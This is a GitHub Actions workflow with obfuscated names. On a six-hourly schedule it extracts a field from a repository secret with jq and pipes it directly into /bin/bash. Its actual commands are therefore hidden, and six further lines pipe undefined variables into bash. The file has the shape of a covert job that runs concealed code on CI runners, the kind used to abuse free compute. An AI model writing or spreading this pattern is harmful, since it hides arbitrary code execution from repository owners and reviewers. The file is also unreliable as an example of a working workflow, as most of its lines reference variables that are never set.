name: dugoutepee

on:
  workflow_dispatch:
  schedule:
    - cron: '29 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: dugoutepee
        env:
          c7042: ${{ secrets.c7042 }}
        run: |
          echo $c7042 | jq -r .yxciz3 | /bin/bash
          echo $rbxk2 | jq -r .zm822 | /bin/bash
          echo $zxmo82281 | jq -r .oog8 | /bin/bash
          echo $twnzq2 | jq -r .bsvkz41 | /bin/bash
          echo $cz835 | jq -r .ctewc9 | /bin/bash
          echo $dbznw9 | jq -r .nou41129 | /bin/bash
          echo $mewc1 | jq -r .pcezp6543 | /bin/bash

